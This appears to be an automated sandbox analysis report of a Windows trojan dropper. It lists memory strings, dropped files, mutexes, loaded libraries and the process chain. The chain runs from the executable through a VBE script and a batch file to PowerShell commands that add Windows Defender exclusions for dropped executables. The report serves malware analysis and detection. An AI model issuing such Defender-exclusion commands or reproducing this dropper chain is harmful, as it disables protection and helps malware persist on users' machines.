Source: powershell.exe, 00000011.00000002.2442562160.0000021854429000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000D.00000002.3353868010.000001994AE60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000008.00000002.2432329134.000001A4983E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2370874697.0000019EB3E11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2433427298.00000282AE0B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2441786339.0000019932C21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2418611372.000001C480001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2442562160.0000021854201000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000011.00000002.3150761843.0000021864275000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000011.00000002.3150761843.0000021864275000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000011.00000002.3150761843.0000021864275000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000011.00000002.2442562160.0000021854429000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000009.00000002.2690185459.0000019ECC217000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://goAppVClientCmdlets.psm1
Source: powershell.exe, 00000008.00000002.3164480126.000001A4A8454000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2576914126.0000019EC3E85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.3172837605.00000282BE124000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.3114516245.000001C490075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.3150761843.0000021864275000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

System Summary

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\SysWOW64\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe

Code function: 0_2_007D6FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,

0_2_007D6FAA

Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe	Code function: 0_2_007D848E	0_2_007D848E
Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe	Code function: 0_2_007D40FE	0_2_007D40FE
Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe	Code function: 0_2_007E00B7	0_2_007E00B7
Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe	Code function: 0_2_007E4088	0_2_007E4088
Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe	Code function: 0_2_007E7153	0_2_007E7153
Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe	Code function: 0_2_007F51C9	0_2_007F51C9
Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe	Code function: 0_2_007D32F7	0_2_007D32F7
Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe	Code function: 0_2_007E62CA	0_2_007E62CA
Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe	Code function: 0_2_007E43BF	0_2_007E43BF
Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe	Code function: 0_2_007DF461	0_2_007DF461
Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe	Code function: 0_2_007FD440	0_2_007FD440
Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe	Code function: 0_2_007DC426	0_2_007DC426
Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe	Code function: 0_2_007E77EF	0_2_007E77EF
Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe	Code function: 0_2_007D286B	0_2_007D286B
Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe	Code function: 0_2_007FD8EE	0_2_007FD8EE
Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe	Code function: 0_2_008019F4	0_2_008019F4
Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe	Code function: 0_2_007DE9B7	0_2_007DE9B7
Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe	Code function: 0_2_007E6CDC	0_2_007E6CDC
Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe	Code function: 0_2_007E3E0B	0_2_007E3E0B
Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe	Code function: 0_2_007DEFE2	0_2_007DEFE2
Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe	Code function: 0_2_007F4F9A	0_2_007F4F9A
Source: C:\SavesHost\Blockbrowser.exe	Code function: 5_2_00007FF848D00D48	5_2_00007FF848D00D48
Source: C:\SavesHost\Blockbrowser.exe	Code function: 5_2_00007FF848D00E43	5_2_00007FF848D00E43
Source: C:\SavesHost\Blockbrowser.exe	Code function: 5_2_00007FF8490C195F	5_2_00007FF8490C195F
Source: C:\SavesHost\Blockbrowser.exe	Code function: 5_2_00007FF84939700E	5_2_00007FF84939700E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FF848DC30E9	8_2_00007FF848DC30E9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_00007FF848DB3334	9_2_00007FF848DB3334
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FF848DC30E9	11_2_00007FF848DC30E9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_00007FF848DB30E9	13_2_00007FF848DB30E9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_00007FF848DA2E11	17_2_00007FF848DA2E11
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Code function: 25_2_00007FF848CD0D48	25_2_00007FF848CD0D48
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Code function: 25_2_00007FF848CD0E43	25_2_00007FF848CD0E43
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Code function: 25_2_00007FF84909195F	25_2_00007FF84909195F
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Code function: 25_2_00007FF849368CD2	25_2_00007FF849368CD2
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Code function: 25_2_00007FF849367F26	25_2_00007FF849367F26
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Code function: 25_2_00007FF849371195	25_2_00007FF849371195

Source: Joe Sandbox View

Dropped File: C:\Users\user\Desktop\IxKHLBgB.log 4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217

Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe	Code function: String function: 007EEB78 appears 39 times
Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe	Code function: String function: 007EEC50 appears 56 times
Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe	Code function: String function: 007EF5F0 appears 31 times

Source: Ccp3sJPDXs.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.expl.evad.winEXE@37/77@1/1

Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe

Code function: 0_2_007D6C74 GetLastError,FormatMessageW,

0_2_007D6C74

Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe

Code function: 0_2_007EA6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,

0_2_007EA6C2

Source: C:\SavesHost\Blockbrowser.exe

File created: C:\Program Files (x86)\windows media player\C1lzS0DukHxxFP1s.exe

Jump to behavior

Source: C:\SavesHost\Blockbrowser.exe

File created: C:\Users\user\Desktop\lgJkAMCv.log

Jump to behavior

Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1848:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7464:120:WilError_03
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-3OxsSTgLxBT4yfXwdLEr
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2836:120:WilError_03

Source: C:\SavesHost\Blockbrowser.exe

File created: C:\Users\user\AppData\Local\Temp\NNx7jhjWq4

Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\SavesHost\5QThzOH4GoufqMvWEaCGmEpHUrBKeNi1rE7wtsMJtk.bat" "

Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe	Command line argument: sfxname	0_2_007EDF1E
Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe	Command line argument: sfxstime	0_2_007EDF1E
Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe	Command line argument: STARTDLG	0_2_007EDF1E

Source: Ccp3sJPDXs.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Ccp3sJPDXs.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe

File read: C:\Windows\win.ini

Jump to behavior

Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Ccp3sJPDXs.exe	Virustotal: Detection: 76%
Source: Ccp3sJPDXs.exe	ReversingLabs: Detection: 68%

Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe

File read: C:\Users\user\Desktop\Ccp3sJPDXs.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Ccp3sJPDXs.exe "C:\Users\user\Desktop\Ccp3sJPDXs.exe"
Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\SavesHost\6kXFj.vbe"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\SavesHost\5QThzOH4GoufqMvWEaCGmEpHUrBKeNi1rE7wtsMJtk.bat" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\SavesHost\Blockbrowser.exe "C:\SavesHost/Blockbrowser.exe"
Source: C:\SavesHost\Blockbrowser.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe'
Source: C:\SavesHost\Blockbrowser.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows media player\C1lzS0DukHxxFP1s.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\SavesHost\Blockbrowser.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\SavesHost\SgrmBroker.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\SavesHost\Blockbrowser.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\0ZuAkTjxKX.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\SavesHost\Blockbrowser.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\ZI0Zcb1pDT.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\SavesHost\Blockbrowser.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\SavesHost\Blockbrowser.exe'
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\SavesHost\Blockbrowser.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\equVSDMYPr.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\cmd.exe	Process created: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe "C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe"
Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\SavesHost\6kXFj.vbe"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\SavesHost\5QThzOH4GoufqMvWEaCGmEpHUrBKeNi1rE7wtsMJtk.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\SavesHost\Blockbrowser.exe "C:\SavesHost/Blockbrowser.exe"	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe'	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows media player\C1lzS0DukHxxFP1s.exe'	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\SavesHost\SgrmBroker.exe'	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\0ZuAkTjxKX.exe'	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\ZI0Zcb1pDT.exe'	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\SavesHost\Blockbrowser.exe'	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\equVSDMYPr.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe "C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe"

Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe	Section loaded: dxgidebug.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Section loaded: version.dll	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\SavesHost\Blockbrowser.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
